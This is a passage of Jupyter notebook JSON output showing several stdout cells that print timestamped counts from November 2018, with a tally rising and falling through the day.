"['2018-11-26 13:39:47.226198', 23]\n",
"['2018-11-26 13:40:02.877605', 22]\n",
"['2018-11-26 13:40:15.375136', 21]\n",
"['2018-11-26 13:40:15.448258', 22]\n",
"['2018-11-26 13:40:26.848505', 23]\n",
"['2018-11-26 13:40:31.019510', 24]\n",
"['2018-11-26 13:40:35.418065', 25]\n",
"['2018-11-26 13:40:49.763085', 26]\n",
"['2018-11-26 13:40:52.681975', 25]\n",
"['2018-11-26 13:40:52.799802', 26]\n",
"['2018-11-26 13:41:07.513070', 27]\n",
"['2018-11-26 13:41:13.252882', 25]\n",
"['2018-11-26 13:41:20.404220', 26]\n",
"['2018-11-26 13:41:31.720879', 24]\n",
"['2018-11-26 13:41:38.021739', 25]\n",
"['2018-11-26 13:41:54.377608', 26]\n",
"['2018-11-26 13:42:01.343205', 27]\n",
"['2018-11-26 13:42:06.633468', 28]\n",
"['2018-11-26 13:42:14.065448', 29]\n",
"['2018-11-26 13:42:14.687784', 30]\n",
"['2018-11-26 13:42:18.897194', 31]\n",
"['2018-11-26 13:42:21.193917', 30]\n",
"['2018-11-26 13:42:31.333202', 31]\n",
"['2018-11-26 13:42:43.983583', 32]\n",
"['2018-11-26 13:43:13.222015', 31]\n",
"['2018-11-26 13:43:29.227724', 30]\n",
"['2018-11-26 13:43:50.701900', 31]\n",
"['2018-11-26 13:45:08.925182', 32]\n",
"['2018-11-26 13:45:13.962977', 31]\n",
"['2018-11-26 13:45:32.788767', 29]\n",
"['2018-11-26 13:45:51.215043', 28]\n",
"['2018-11-26 13:45:54.601767', 27]\n",
"['2018-11-26 13:45:59.736800', 25]\n",
"['2018-11-26 13:46:08.941078', 24]\n",
"['2018-11-26 13:46:21.560483', 20]\n",
"['2018-11-26 13:46:25.452554', 21]\n",
"['2018-11-26 13:46:38.539046', 20]\n",
"['2018-11-26 13:46:51.812729', 19]\n",
"['2018-11-26 13:46:59.432315', 18]\n",
"['2018-11-26 13:47:04.080250', 19]\n",
"['2018-11-26 13:47:10.223660', 20]\n",
"['2018-11-26 13:47:10.643909', 21]\n",
"['2018-11-26 13:47:28.697429', 22]\n",
"['2018-11-26 13:47:40.520425', 20]\n",
"['2018-11-26 13:49:55.395793', 21]\n",
"['2018-11-26 13:50:47.511756', 22]\n",
"['2018-11-26 13:51:01.408474', 21]\n",
"['2018-11-26 13:51:41.695494', 20]\n",
"['2018-11-26 13:51:44.579308', 19]\n",
"['2018-11-26 13:53:02.604233', 18]\n",
"['2018-11-26 13:53:46.890990', 19]\n",
"['2018-11-26 13:53:49.982169', 18]\n",
"['2018-11-26 13:53:57.415149', 16]\n",
"['2018-11-26 13:54:45.976018', 14]\n",
"['2018-11-26 13:54:50.378425', 13]\n",
"['2018-11-26 13:54:52.758607', 14]\n",
"['2018-11-26 13:55:43.769453', 13]\n",
"['2018-11-26 13:55:52.050944', 12]\n",
"['2018-11-26 13:55:54.412010', 13]\n",
"['2018-11-26 13:56:21.824637', 14]\n",
"['2018-11-26 13:56:43.605823', 15]\n",
"['2018-11-26 13:57:07.680085', 14]\n",
"['2018-11-26 13:57:21.822634', 13]\n",
"['2018-11-26 13:58:03.872693', 12]\n",
"['2018-11-26 13:58:55.350800', 11]\n",
"['2018-11-26 13:59:03.735352', 12]\n",
"['2018-11-26 13:59:47.939548', 13]\n",
"['2018-11-26 13:59:56.275642', 12]\n",
"['2018-11-26 14:00:56.105865', 11]\n",
"['2018-11-26 14:01:26.220433', 10]\n",
"['2018-11-26 14:03:04.456503', 8]\n",
"['2018-11-26 14:03:43.031303', 7]\n",
"['2018-11-26 14:04:21.158837', 6]\n",
"['2018-11-26 14:04:51.388965', 5]\n",
"['2018-11-26 14:10:26.799778', 2]\n",
"['2018-11-26 14:13:54.578671', 3]\n",
"['2018-11-26 14:18:11.058466', 2]\n",
"['2018-11-26 14:20:34.404811', 3]\n",
"['2018-11-26 14:20:45.505813', 4]\n",
"['2018-11-26 14:20:53.709517', 5]\n",
"['2018-11-26 14:20:55.226949', 6]\n",
"['2018-11-26 14:21:33.477326', 7]\n",
"['2018-11-26 14:24:30.359288', 8]\n",
"['2018-11-26 14:24:51.919108', 9]\n",
"['2018-11-26 14:25:08.076579', 8]\n",
"['2018-11-26 14:25:08.161087', 9]\n",
"['2018-11-26 14:25:09.132389', 10]\n",
"['2018-11-26 14:25:13.284533', 11]\n",
"['2018-11-26 14:25:16.564333', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 14:25:29.284706', 11]\n",
"['2018-11-26 14:27:02.282229', 10]\n",
"['2018-11-26 14:27:27.749028', 11]\n",
"['2018-11-26 14:27:31.476050', 12]\n",
"['2018-11-26 14:27:43.849065', 13]\n",
"['2018-11-26 14:27:59.762343', 14]\n",
"['2018-11-26 14:28:03.270492', 15]\n",
"['2018-11-26 14:28:13.056653', 16]\n",
"['2018-11-26 14:28:29.541778', 17]\n",
"['2018-11-26 14:28:31.928041', 16]\n",
"['2018-11-26 14:28:47.496913', 17]\n",
"['2018-11-26 14:28:51.612098', 18]\n",
"['2018-11-26 14:28:52.242279', 17]\n",
"['2018-11-26 14:30:17.623482', 14]\n",
"['2018-11-26 14:31:28.304302', 13]\n",
"['2018-11-26 14:31:54.700490', 12]\n",
"['2018-11-26 14:31:59.853918', 11]\n",
"['2018-11-26 14:32:23.032023', 10]\n",
"['2018-11-26 14:32:32.869482', 9]\n",
"['2018-11-26 14:32:55.216033', 7]\n",
"['2018-11-26 14:33:17.832135', 6]\n",
"['2018-11-26 14:33:47.896919', 7]\n",
"['2018-11-26 14:35:08.975934', 6]\n",
"['2018-11-26 14:35:11.907971', 7]\n",
"['2018-11-26 14:37:01.028265', 6]\n",
"['2018-11-26 14:37:14.225810', 7]\n",
"['2018-11-26 14:38:33.166583', 8]\n",
"['2018-11-26 14:38:40.118587', 9]\n",
"['2018-11-26 14:40:31.075040', 7]\n",
"['2018-11-26 14:40:59.316147', 8]\n",
"['2018-11-26 14:41:40.160653', 7]\n",
"['2018-11-26 14:41:45.075009', 8]\n",
"['2018-11-26 14:44:30.701044', 9]\n",
"['2018-11-26 14:45:01.871757', 8]\n",
"['2018-11-26 14:47:24.028140', 7]\n",
"['2018-11-26 14:52:18.219958', 5]\n",
"['2018-11-26 14:53:54.296959', 3]\n",
"['2018-11-26 14:54:16.341680', 4]\n",
"['2018-11-26 14:58:07.572456', 3]\n",
"['2018-11-26 15:01:39.197012', 4]\n",
"['2018-11-26 15:02:29.227277', 3]\n",
"['2018-11-26 15:03:59.757490', 4]\n",
"['2018-11-26 15:04:03.842588', 5]\n",
"['2018-11-26 15:04:37.611695', 6]\n",
"['2018-11-26 15:04:43.058351', 7]\n",
"['2018-11-26 15:04:55.412845', 8]\n",
"['2018-11-26 15:05:45.281827', 9]\n",
"['2018-11-26 15:05:57.633039', 10]\n",
"['2018-11-26 15:06:32.606295', 9]\n",
"['2018-11-26 15:08:44.918139', 8]\n",
"['2018-11-26 15:09:57.361913', 9]\n",
"['2018-11-26 15:12:49.763233', 10]\n",
"['2018-11-26 15:14:08.446406', 11]\n",
"['2018-11-26 15:15:49.662245', 10]\n",
"['2018-11-26 15:17:00.600476', 9]\n",
"['2018-11-26 15:17:57.011271', 8]\n",
"['2018-11-26 15:18:15.004382', 7]\n",
"['2018-11-26 15:20:58.461233', 8]\n",
"['2018-11-26 15:21:09.157046', 9]\n",
"['2018-11-26 15:22:08.424551', 10]\n",
"['2018-11-26 15:23:43.473123', 11]\n",
"['2018-11-26 15:24:22.356353', 12]\n",
"['2018-11-26 15:26:07.918938', 13]\n",
"['2018-11-26 15:26:08.965867', 14]\n",
"['2018-11-26 15:26:50.482971', 15]\n",
"['2018-11-26 15:27:15.067187', 16]\n",
"['2018-11-26 15:27:52.815428', 17]\n",
"['2018-11-26 15:28:25.070637', 18]\n",
"['2018-11-26 15:28:41.808674', 17]\n",
"['2018-11-26 15:29:04.744089', 15]\n",
"['2018-11-26 15:29:20.128422', 16]\n",
"['2018-11-26 15:29:22.646500', 17]\n",
"['2018-11-26 15:29:31.711803', 18]\n",
"['2018-11-26 15:30:09.599154', 17]\n",
"['2018-11-26 15:30:11.937041', 18]\n",
"['2018-11-26 15:31:11.403075', 17]\n",
"['2018-11-26 15:31:13.458042', 16]\n",
"['2018-11-26 15:31:54.203131', 15]\n",
"['2018-11-26 15:32:08.366922', 14]\n",
"['2018-11-26 15:32:12.462310', 13]\n",
"['2018-11-26 15:32:26.696978', 12]\n",
"['2018-11-26 15:33:21.543430', 13]\n",
"['2018-11-26 15:33:35.232639', 12]\n",
"['2018-11-26 15:33:49.538414', 13]\n",
"['2018-11-26 15:34:12.232167', 12]\n",
"['2018-11-26 15:34:28.243850', 10]\n",
"['2018-11-26 15:36:21.736869', 9]\n",
"['2018-11-26 15:36:26.196433', 10]\n",
"['2018-11-26 15:36:38.165308', 9]\n",
"['2018-11-26 15:37:10.357229', 8]\n",
"['2018-11-26 15:37:38.493160', 7]\n",
"['2018-11-26 15:38:06.534903', 6]\n",
"['2018-11-26 15:39:06.855997', 5]\n",
"['2018-11-26 15:40:11.810823', 6]\n",
"['2018-11-26 15:44:23.832139', 4]\n",
"['2018-11-26 15:44:42.776770', 3]\n",
"['2018-11-26 15:46:59.579490', 4]\n",
"['2018-11-26 15:47:25.897636', 5]\n",
"['2018-11-26 15:47:30.939009', 6]\n",
"['2018-11-26 15:52:30.361113', 3]\n",
"['2018-11-26 15:53:17.822518', 4]\n",
"['2018-11-26 15:53:34.139025', 5]\n",
"['2018-11-26 15:54:13.505418', 4]\n",
"['2018-11-26 15:55:41.341656', 5]\n",
"['2018-11-26 15:59:16.567657', 6]\n",
"['2018-11-26 15:59:53.356764', 5]\n",
"['2018-11-26 16:00:31.725066', 6]\n",
"['2018-11-26 16:01:24.674237', 5]\n",
"['2018-11-26 16:04:31.792921', 4]\n",
"['2018-11-26 16:07:36.496718', 5]\n",
"['2018-11-26 16:10:27.406635', 6]\n",
"['2018-11-26 16:12:14.421314', 7]\n",
"['2018-11-26 16:13:29.627287', 8]\n",
"['2018-11-26 16:13:37.463664', 9]\n",
"['2018-11-26 16:13:46.406379', 10]\n",
"['2018-11-26 16:13:55.865857', 11]\n",
"['2018-11-26 16:13:59.592935', 12]\n",
"['2018-11-26 16:14:01.346483', 13]\n",
"['2018-11-26 16:14:35.266238', 14]\n",
"['2018-11-26 16:14:55.213279', 15]\n",
"['2018-11-26 16:16:33.469059', 13]\n",
"['2018-11-26 16:19:03.753815', 12]\n",
"['2018-11-26 16:19:21.492118', 11]\n",
"['2018-11-26 16:19:34.095153', 10]\n",
"['2018-11-26 16:19:42.164959', 9]\n",
"['2018-11-26 16:19:47.526665', 10]\n",
"['2018-11-26 16:19:48.722168', 11]\n",
"['2018-11-26 16:19:50.704231', 12]\n",
"['2018-11-26 16:20:47.689732', 13]\n",
"['2018-11-26 16:21:15.446642', 14]\n",
"['2018-11-26 16:22:01.168121', 15]\n",
"['2018-11-26 16:22:41.193994', 14]\n",
"['2018-11-26 16:23:02.388888', 15]\n",
"['2018-11-26 16:23:14.392676', 16]\n",
"['2018-11-26 16:23:18.257289', 17]\n",
"['2018-11-26 16:23:55.617098', 15]\n",
"['2018-11-26 16:24:47.085168', 16]\n",
"['2018-11-26 16:25:28.791751', 14]\n",
"['2018-11-26 16:26:42.127459', 10]\n",
"['2018-11-26 16:26:43.407943', 11]\n",
"['2018-11-26 16:26:49.625171', 12]\n",
"['2018-11-26 16:27:43.892053', 9]\n",
"['2018-11-26 16:27:48.809960', 8]\n",
"['2018-11-26 16:28:12.345685', 7]\n",
"['2018-11-26 16:28:16.383506', 8]\n",
"['2018-11-26 16:28:49.683463', 6]\n",
"['2018-11-26 16:30:52.549569', 4]\n",
"['2018-11-26 16:31:02.789545', 5]\n",
"['2018-11-26 16:34:49.409435', 6]\n",
"['2018-11-26 16:38:31.014628', 7]\n",
"['2018-11-26 16:38:48.199843', 6]\n",
"['2018-11-26 16:39:25.937340', 5]\n",
"['2018-11-26 16:42:42.188853', 4]\n",
"['2018-11-26 16:43:12.539021', 3]\n",
"['2018-11-26 16:44:29.169589', 2]\n",
"['2018-11-26 16:52:51.899234', 3]\n",
"['2018-11-26 16:53:41.609540', 4]\n",
"['2018-11-26 16:54:02.457450', 5]\n",
"['2018-11-26 16:54:51.200468', 6]\n",
"['2018-11-26 16:59:27.730089', 7]\n",
"['2018-11-26 17:01:47.942657', 6]\n",
"['2018-11-26 17:02:32.644747', 5]\n",
"['2018-11-26 17:04:18.373823', 6]\n",
"['2018-11-26 17:06:45.567904', 7]\n",
"['2018-11-26 17:11:42.858253', 8]\n",
"['2018-11-26 17:12:22.057886', 9]\n",
"['2018-11-26 17:12:55.583157', 10]\n",
"['2018-11-26 17:13:09.448176', 9]\n",
"['2018-11-26 17:13:22.019145', 10]\n",
"['2018-11-26 17:15:40.012970', 11]\n",
"['2018-11-26 17:16:47.013245', 10]\n",
"['2018-11-26 17:17:02.978092', 9]\n",
"['2018-11-26 17:17:22.722535', 8]\n",
"['2018-11-26 17:17:54.004283', 9]\n",
"['2018-11-26 17:18:46.798423', 10]\n",
"['2018-11-26 17:20:07.468584', 9]\n",
"['2018-11-26 17:20:43.400378', 10]\n",
"['2018-11-26 17:21:28.990073', 11]\n",
"['2018-11-26 17:22:52.459680', 10]\n",
"['2018-11-26 17:23:12.340879', 9]\n",
"['2018-11-26 17:23:44.133882', 10]\n",
"['2018-11-26 17:24:03.399498', 11]\n",
"['2018-11-26 17:24:10.953782', 10]\n",
"['2018-11-26 17:24:24.173909', 9]\n",
"['2018-11-26 17:24:25.486696', 10]\n",
"['2018-11-26 17:24:54.204494', 9]\n",
"['2018-11-26 17:25:14.603539', 10]\n",
"['2018-11-26 17:25:20.466988', 11]\n",
"['2018-11-26 17:25:37.774874', 12]\n",
"['2018-11-26 17:25:52.129183', 13]\n",
"['2018-11-26 17:25:53.227562', 14]\n",
"['2018-11-26 17:25:59.622604', 15]\n",
"['2018-11-26 17:26:08.639112', 16]\n",
"['2018-11-26 17:26:54.314013', 15]\n",
"['2018-11-26 17:28:06.312632', 14]\n",
"['2018-11-26 17:28:09.429994', 15]\n",
"['2018-11-26 17:28:17.714375', 16]\n",
"['2018-11-26 17:28:55.178721', 15]\n",
"['2018-11-26 17:28:55.555772', 16]\n",
"['2018-11-26 17:29:07.452818', 15]\n",
"['2018-11-26 17:29:18.628659', 14]\n",
"['2018-11-26 17:29:52.482479', 13]\n",
"['2018-11-26 17:30:10.360564', 12]\n",
"['2018-11-26 17:30:14.133738', 13]\n",
"['2018-11-26 17:30:20.712711', 14]\n",
"['2018-11-26 17:30:25.185505', 15]\n",
"['2018-11-26 17:30:45.480882', 14]\n",
"['2018-11-26 17:30:48.868603', 15]\n",
"['2018-11-26 17:30:51.433247', 16]\n",
"['2018-11-26 17:30:55.200217', 17]\n",
"['2018-11-26 17:31:09.646967', 18]\n",
"['2018-11-26 17:31:13.273158', 19]\n",
"['2018-11-26 17:31:32.110927', 20]\n",
"['2018-11-26 17:31:37.842269', 19]\n",
"['2018-11-26 17:31:39.705887', 20]\n",
"['2018-11-26 17:31:45.719667', 21]\n",
"['2018-11-26 17:31:47.638801', 22]\n",
"['2018-11-26 17:32:10.240173', 21]\n",
"['2018-11-26 17:32:18.564597', 20]\n",
"['2018-11-26 17:32:56.089335', 19]\n",
"['2018-11-26 17:33:02.052082', 20]\n",
"['2018-11-26 17:33:58.606003', 19]\n",
"['2018-11-26 17:34:18.202364', 18]\n",
"['2018-11-26 17:34:29.456691', 19]\n",
"['2018-11-26 17:35:25.495170', 18]\n",
"['2018-11-26 17:35:54.393301', 19]\n",
"['2018-11-26 17:36:10.902870', 18]\n",
"['2018-11-26 17:36:16.460804', 19]\n",
"['2018-11-26 17:36:16.557952', 20]\n",
"['2018-11-26 17:36:36.468662', 19]\n",
"['2018-11-26 17:36:36.896054', 18]\n",
"['2018-11-26 17:36:45.760918', 17]\n",
"['2018-11-26 17:36:56.486751', 16]\n",
"['2018-11-26 17:37:03.127622', 15]\n",
"['2018-11-26 17:37:06.933459', 14]\n",
"['2018-11-26 17:37:31.624500', 11]\n",
"['2018-11-26 17:38:34.384098', 9]\n",
"['2018-11-26 17:40:02.302582', 8]\n",
"['2018-11-26 17:40:13.958328', 9]\n",
"['2018-11-26 17:40:14.551393', 10]\n",
"['2018-11-26 17:46:28.346785', 2]\n",
"['2018-11-26 17:48:43.335953', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 18:01:24.096415', 2]\n",
"['2018-11-26 18:03:29.064194', 3]\n",
"['2018-11-26 18:08:26.440229', 4]\n",
"['2018-11-26 18:08:35.745797', 5]\n",
"['2018-11-26 18:10:25.033728', 6]\n",
"['2018-11-26 18:11:25.877110', 5]\n",
"['2018-11-26 18:12:13.106242', 6]\n",
"['2018-11-26 18:12:49.905359', 7]\n",
"['2018-11-26 18:13:31.192034', 8]\n",
"['2018-11-26 18:13:34.077057', 9]\n",
"['2018-11-26 18:13:43.829846', 10]\n",
"['2018-11-26 18:13:54.972905', 11]\n",
"['2018-11-26 18:14:01.332090', 12]\n",
"['2018-11-26 18:14:06.518042', 13]\n",
"['2018-11-26 18:14:08.161587', 14]\n",
"['2018-11-26 18:14:53.873278', 15]\n",
"['2018-11-26 18:14:58.210567', 16]\n",
"['2018-11-26 18:15:26.313347', 17]\n",
"['2018-11-26 18:15:26.424544', 18]\n",
"['2018-11-26 18:15:32.987615', 19]\n",
"['2018-11-26 18:16:01.710873', 20]\n",
"['2018-11-26 18:16:20.692275', 21]\n",
"['2018-11-26 18:16:34.534253', 22]\n",
"['2018-11-26 18:17:00.237128', 21]\n",
"['2018-11-26 18:17:34.461833', 19]\n",
"['2018-11-26 18:17:54.683300', 18]\n",
"['2018-11-26 18:18:10.000570', 19]\n",
"['2018-11-26 18:18:11.924564', 20]\n",
"['2018-11-26 18:18:16.564629', 19]\n",
"['2018-11-26 18:18:20.956612', 18]\n",
"['2018-11-26 18:18:43.636939', 19]\n",
"['2018-11-26 18:18:54.513010', 18]\n",
"['2018-11-26 18:19:11.483136', 16]\n",
"['2018-11-26 18:19:24.787809', 17]\n",
"['2018-11-26 18:19:28.626583', 15]\n",
"['2018-11-26 18:19:30.386000', 16]\n",
"['2018-11-26 18:19:33.170052', 15]\n",
"['2018-11-26 18:19:53.152654', 16]\n",
"['2018-11-26 18:20:03.848409', 14]\n",
"['2018-11-26 18:20:07.155954', 13]\n",
"['2018-11-26 18:20:17.149342', 12]\n",
"['2018-11-26 18:20:21.590675', 11]\n",
"['2018-11-26 18:20:39.664261', 10]\n",
"['2018-11-26 18:20:52.662570', 11]\n",
"['2018-11-26 18:21:11.042830', 12]\n",
"['2018-11-26 18:21:23.668019', 13]\n",
"['2018-11-26 18:21:29.249455', 14]\n",
"['2018-11-26 18:21:45.940449', 15]\n",
"['2018-11-26 18:22:03.451917', 14]\n",
"['2018-11-26 18:23:02.066900', 13]\n",
"['2018-11-26 18:23:12.600038', 12]\n",
"['2018-11-26 18:23:31.591325', 13]\n",
"['2018-11-26 18:24:02.372238', 14]\n",
"['2018-11-26 18:24:23.970849', 13]\n",
"['2018-11-26 18:24:31.923558', 11]\n",
"['2018-11-26 18:24:55.498144', 10]\n",
"['2018-11-26 18:25:25.581184', 8]\n",
"['2018-11-26 18:26:27.178142', 6]\n",
"['2018-11-26 18:26:39.739455', 7]\n",
"['2018-11-26 18:29:39.323694', 8]\n",
"['2018-11-26 18:29:46.247383', 9]\n",
"['2018-11-26 18:29:56.252990', 8]\n",
"['2018-11-26 18:31:40.871033', 9]\n",
"['2018-11-26 18:32:59.787254', 8]\n",
"['2018-11-26 18:33:06.794662', 9]\n",
"['2018-11-26 18:33:41.100554', 8]\n",
"['2018-11-26 18:34:00.709543', 7]\n",
"['2018-11-26 18:34:23.377321', 8]\n",
"['2018-11-26 18:35:42.038420', 7]\n",
"['2018-11-26 18:37:16.715315', 8]\n",
"['2018-11-26 18:38:30.611391', 7]\n",
"['2018-11-26 18:40:50.061901', 6]\n",
"['2018-11-26 18:43:15.701926', 5]\n",
"['2018-11-26 18:50:19.268418', 2]\n",
"['2018-11-26 18:50:52.887571', 3]\n",
"['2018-11-26 18:52:58.549583', 4]\n",
"['2018-11-26 18:53:12.800758', 5]\n",
"['2018-11-26 18:55:02.695515', 4]\n",
"['2018-11-26 18:55:07.631958', 5]\n",
"['2018-11-26 18:55:36.451283', 6]\n",
"['2018-11-26 18:56:12.168087', 7]\n",
"['2018-11-26 18:57:29.331427', 6]\n",
"['2018-11-26 19:01:53.888133', 5]\n",
"['2018-11-26 19:03:27.619603', 4]\n",
"['2018-11-26 19:05:12.849597', 3]\n",
"['2018-11-26 19:06:52.890554', 4]\n",
"['2018-11-26 19:06:59.544459', 5]\n",
"['2018-11-26 19:09:02.956070', 6]\n",
"['2018-11-26 19:10:32.735716', 7]\n",
"['2018-11-26 19:11:03.085943', 6]\n",
"['2018-11-26 19:11:16.056336', 7]\n",
"['2018-11-26 19:12:05.316507', 6]\n",
"['2018-11-26 19:13:21.900992', 7]\n",
"['2018-11-26 19:13:23.193855', 8]\n",
"['2018-11-26 19:14:56.991180', 7]\n",
"['2018-11-26 19:15:11.290250', 8]\n",
"['2018-11-26 19:15:20.133098', 7]\n",
"['2018-11-26 19:17:08.906646', 6]\n",
"['2018-11-26 19:18:43.146773', 5]\n",
"['2018-11-26 19:20:05.413170', 4]\n",
"['2018-11-26 19:20:15.156408', 3]\n",
"['2018-11-26 19:20:34.672434', 4]\n",
"['2018-11-26 19:20:47.141196', 5]\n",
"['2018-11-26 19:23:19.944951', 6]\n",
"['2018-11-26 19:23:31.098940', 7]\n",
"['2018-11-26 19:25:08.085826', 5]\n",
"['2018-11-26 19:26:44.121725', 6]\n",
"['2018-11-26 19:26:58.534655', 7]\n",
"['2018-11-26 19:27:46.618010', 8]\n",
"['2018-11-26 19:27:52.609224', 9]\n",
"['2018-11-26 19:28:43.156246', 10]\n",
"['2018-11-26 19:28:55.625900', 11]\n",
"['2018-11-26 19:29:37.069819', 12]\n",
"['2018-11-26 19:29:52.069994', 11]\n",
"['2018-11-26 19:30:47.430740', 12]\n",
"['2018-11-26 19:31:18.065742', 10]\n",
"['2018-11-26 19:31:20.695584', 11]\n",
"['2018-11-26 19:31:21.924597', 12]\n",
"['2018-11-26 19:31:33.283214', 13]\n",
"['2018-11-26 19:31:42.867288', 14]\n",
"['2018-11-26 19:31:54.071222', 13]\n",
"['2018-11-26 19:32:30.221767', 14]\n",
"['2018-11-26 19:33:31.618630', 13]\n",
"['2018-11-26 19:35:50.649396', 10]\n",
"['2018-11-26 19:36:02.371703', 9]\n",
"['2018-11-26 19:36:17.291141', 10]\n",
"['2018-11-26 19:36:29.632571', 11]\n",
"['2018-11-26 19:36:32.289710', 10]\n",
"['2018-11-26 19:37:06.386970', 7]\n",
"['2018-11-26 19:37:17.460805', 6]\n",
"['2018-11-26 19:38:20.019892', 5]\n",
"['2018-11-26 19:40:45.902458', 3]\n",
"['2018-11-26 19:40:52.702438', 4]\n",
"['2018-11-26 19:45:44.139332', 3]\n",
"['2018-11-26 19:58:47.273634', 2]\n",
"['2018-11-26 20:07:53.347724', 3]\n",
"['2018-11-26 20:08:36.526200', 4]\n",
"['2018-11-26 20:11:37.543015', 5]\n",
"['2018-11-26 20:12:31.320339', 3]\n",
"['2018-11-26 20:13:02.440980', 4]\n",
"['2018-11-26 20:13:10.386109', 5]\n",
"['2018-11-26 20:13:16.845939', 6]\n",
"['2018-11-26 20:13:19.235148', 7]\n",
"['2018-11-26 20:13:24.891506', 8]\n",
"['2018-11-26 20:13:33.155185', 9]\n",
"['2018-11-26 20:13:44.356444', 10]\n",
"['2018-11-26 20:13:59.993311', 11]\n",
"['2018-11-26 20:14:03.713450', 12]\n",
"['2018-11-26 20:14:07.109158', 13]\n",
"['2018-11-26 20:14:36.382278', 14]\n",
"['2018-11-26 20:14:48.774502', 15]\n",
"['2018-11-26 20:15:06.027104', 16]\n",
"['2018-11-26 20:15:08.188717', 17]\n",
"['2018-11-26 20:15:38.075198', 18]\n",
"['2018-11-26 20:16:03.495128', 17]\n",
"['2018-11-26 20:16:12.457156', 18]\n",
"['2018-11-26 20:16:19.321169', 19]\n",
"['2018-11-26 20:16:19.986800', 20]\n",
"['2018-11-26 20:16:22.818194', 21]\n",
"['2018-11-26 20:17:08.335373', 20]\n",
"['2018-11-26 20:18:35.726452', 21]\n",
"['2018-11-26 20:18:37.376314', 22]\n",
"['2018-11-26 20:18:45.726935', 23]\n",
"['2018-11-26 20:18:49.887808', 24]\n",
"['2018-11-26 20:18:58.605992', 22]\n",
"['2018-11-26 20:19:01.755150', 21]\n",
"['2018-11-26 20:19:14.995854', 20]\n",
"['2018-11-26 20:19:17.664289', 19]\n",
"['2018-11-26 20:19:38.170214', 18]\n",
"['2018-11-26 20:19:54.263434', 17]\n",
"['2018-11-26 20:20:13.088578', 12]\n",
"['2018-11-26 20:20:30.435839', 8]\n",
"['2018-11-26 20:20:44.197866', 9]\n",
"['2018-11-26 20:20:44.953711', 10]\n",
"['2018-11-26 20:20:55.075514', 11]\n",
"['2018-11-26 20:20:57.362924', 12]\n",
"['2018-11-26 20:21:24.320515', 13]\n",
"['2018-11-26 20:21:32.963935', 14]\n",
"['2018-11-26 20:22:30.008915', 15]\n",
"['2018-11-26 20:22:32.109369', 16]\n",
"['2018-11-26 20:22:32.709941', 17]\n",
"['2018-11-26 20:23:29.153734', 16]\n",
"['2018-11-26 20:23:46.593453', 14]\n",
"['2018-11-26 20:23:48.643134', 15]\n",
"['2018-11-26 20:23:59.973408', 14]\n",
"['2018-11-26 20:25:00.790470', 11]\n",
"['2018-11-26 20:25:34.228993', 8]\n",
"['2018-11-26 20:25:39.675729', 7]\n",
"['2018-11-26 20:26:36.777721', 5]\n",
"['2018-11-26 20:26:58.186284', 4]\n",
"['2018-11-26 20:28:09.200302', 5]\n",
"['2018-11-26 20:28:12.893659', 6]\n",
"['2018-11-26 20:29:12.757808', 7]\n",
"['2018-11-26 20:32:14.410908', 6]\n",
"['2018-11-26 20:33:24.420582', 4]\n",
"['2018-11-26 20:34:34.936542', 5]\n",
"['2018-11-26 20:38:47.784026', 4]\n",
"['2018-11-26 20:39:21.073957', 3]\n",
"['2018-11-26 20:40:58.782823', 4]\n",
"['2018-11-26 20:43:36.035233', 5]\n",
"['2018-11-26 20:44:05.124707', 6]\n",
"['2018-11-26 20:45:01.459639', 4]\n",
"['2018-11-26 20:45:36.028006', 5]\n",
"['2018-11-26 20:45:54.827413', 6]\n",
"['2018-11-26 20:46:40.317467', 7]\n",
"['2018-11-26 20:47:18.647675', 8]\n",
"['2018-11-26 20:49:42.916002', 6]\n",
"['2018-11-26 20:54:03.125238', 7]\n",
"['2018-11-26 20:55:18.711795', 8]\n",
"['2018-11-26 20:58:18.002541', 7]\n",
"['2018-11-26 20:59:44.167066', 6]\n",
"['2018-11-26 21:00:26.835798', 5]\n",
"['2018-11-26 21:03:55.927040', 4]\n",
"['2018-11-26 21:05:18.070575', 5]\n",
"['2018-11-26 21:05:56.705158', 4]\n",
"['2018-11-26 21:06:07.781294', 5]\n",
"['2018-11-26 21:06:07.836497', 6]\n",
"['2018-11-26 21:06:13.916250', 7]\n",
"['2018-11-26 21:06:27.832650', 8]\n",
"['2018-11-26 21:06:54.018034', 9]\n",
"['2018-11-26 21:06:58.985656', 8]\n",
"['2018-11-26 21:07:02.768172', 9]\n",
"['2018-11-26 21:07:40.812118', 8]\n",
"['2018-11-26 21:07:41.918337', 9]\n",
"['2018-11-26 21:07:58.529452', 10]\n",
"['2018-11-26 21:09:13.790858', 11]\n",
"['2018-11-26 21:09:43.003747', 12]\n",
"['2018-11-26 21:09:57.099245', 13]\n",
"['2018-11-26 21:10:09.932388', 11]\n",
"['2018-11-26 21:10:16.836051', 12]\n",
"['2018-11-26 21:10:17.324229', 13]\n",
"['2018-11-26 21:10:22.765627', 11]\n",
"['2018-11-26 21:10:29.181564', 10]\n",
"['2018-11-26 21:10:42.304233', 11]\n",
"['2018-11-26 21:10:52.740814', 12]\n",
"['2018-11-26 21:14:48.583128', 3]\n",
"['2018-11-26 21:14:54.755398', 2]\n",
"['2018-11-26 21:14:56.803923', 1]\n",
"['2018-11-26 21:15:08.237852', 2]\n",
"['2018-11-26 21:17:30.044865', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 05:41:49.424676', 4]\n",
"['2018-11-22 05:42:18.607787', 5]\n",
"['2018-11-22 05:43:03.278484', 6]\n",
"['2018-11-22 05:43:14.529274', 7]\n",
"['2018-11-22 05:43:30.461316', 8]\n",
"['2018-11-22 05:49:39.295149', 4]\n",
"['2018-11-22 06:07:55.424452', 5]\n",
"['2018-11-22 06:10:02.365760', 6]\n",
"['2018-11-22 06:12:13.700123', 7]\n",
"['2018-11-22 06:12:19.074772', 8]\n",
"['2018-11-22 06:12:25.085412', 9]\n",
"['2018-11-22 06:12:34.973520', 10]\n",
"['2018-11-22 06:12:47.324218', 11]\n",
"['2018-11-22 06:13:13.056737', 10]\n",
"['2018-11-22 06:13:38.253178', 11]\n",
"['2018-11-22 06:13:58.499628', 12]\n",
"['2018-11-22 06:14:04.523715', 11]\n",
"['2018-11-22 06:14:38.206361', 12]\n",
"['2018-11-22 06:16:05.381304', 13]\n",
"['2018-11-22 06:17:23.037835', 11]\n",
"['2018-11-22 06:20:01.307178', 8]\n",
"['2018-11-22 06:20:05.913585', 7]\n",
"['2018-11-22 06:24:09.175247', 5]\n",
"['2018-11-22 06:30:12.240895', 4]\n",
"['2018-11-22 06:39:18.496998', 5]\n",
